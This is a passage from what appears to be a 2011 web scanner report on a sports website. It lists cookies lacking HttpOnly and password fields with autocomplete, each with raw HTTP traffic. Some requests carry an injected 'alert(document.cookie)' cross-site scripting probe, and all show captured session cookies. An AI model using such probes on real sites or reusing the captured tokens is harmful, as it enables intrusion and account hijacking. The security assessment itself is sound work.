User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Location: http://msn.foxsports.com/account/transition?fu=%2F&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D
Content-Length: 0
Expires: Sat, 08 Jan 2011 00:30:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:30:34 GMT
Connection: close
Set-Cookie: pALERTED=TRUE; Domain=.foxsports.com; Expires=Mon, 07-Feb-2011 00:30:34 GMT; Path=/
Set-Cookie: pEFSUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Path=/
Set-Cookie: pExternalUser=; Domain=.foxsports.com; Path=/
Set-Cookie: pLMD="2011-01-08 00:29:40"; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_FNAME=Z1NVLTXWY1w=; Domain=.foxsports.com; Path=/
Set-Cookie: pENC_LNAME=/wgeX1XilBI=; Domain=.foxsports.com; Path=/
Set-Cookie: pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; Domain=.foxsports.com; Path=/
Set-Cookie: pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; Domain=.foxsports.com; Path=/
Set-Cookie: pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; Domain=.foxsports.com; Path=/
Set-Cookie: pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; Domain=.foxsports.com; Path=/
Set-Cookie: pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; Domain=.foxsports.com; Path=/
Set-Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; Domain=.foxsports.com; Path=/
Set-Cookie: pUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Path=/


8.8. http://msn.foxsports.com/fantasy/basketball/hotstreak/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/basketball/hotstreak/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fantasy/basketball/hotstreak/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 27381
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKsceEx4Px8ipDX7pZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

8.9. http://msn.foxsports.com/fantasy/football/frankspicks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/football/frankspicks/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fantasy/football/frankspicks/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 24812
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKscei73uaW8KKlbpZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

9. Password field with autocomplete enabled
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


9.1. http://msn.foxsports.com/account/regPopup

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/regPopup

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /account/regPopup?divId=registration&efsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/account/transition?fu=http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1&initiatingAction=registration&egs=Br6fOGGTWiuzTHiTHk2TzuyT6zQ%3D&ts=1294446581&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:29:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:29:45 GMT
Connection: close
Content-Length: 13026


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="ht
...[SNIP]...
<div id="passwordChangeStart">
<form class="popupForm" name="createPassword" action='https://s.foxsports.com/account/createPassword' method="post" onSubmit="submitForm(this, {type: 'password-change', beginDiv: 'passwordChangeStart', returnDiv:'passwordChangeSuccess'}); return false;">
<div class="inputLabelPassword">
...[SNIP]...
</div>
<input type="password" name="password" class="password" title="Password" />
<div class="inputLabelPassword">
...[SNIP]...
</div>
<input type="password" name="newPassword" class="password" title="Password" />
<div class="inputLabelPassword">
...[SNIP]...
</div>
<input type="password" name="newPasswordAgain" class="password" title="Password" />
<div class="statusMessage">
...[SNIP]...

9.2. http://msn.foxsports.com/account/register

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/register

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /account/register?fu=http%3A%2F%2Fmsn.foxsports.com%2Fcollegefootball%2Fstory%2FStanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611%3F8dd92'-alert(document.cookie)-'c38e52b2865%3D1 HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:28:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:28:45 GMT
Connection: close
Content-Length: 22487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div class="registration tab-container">

<form id="my-account-form" name="my-account-form" onsubmit="submitMe(); return false;" action="https://s.foxsports.com/account/registration" method="post" class="account-form">
<input type="hidden" name="euid" value="" id="my-account-form_euid"/>
...[SNIP]...
</label>
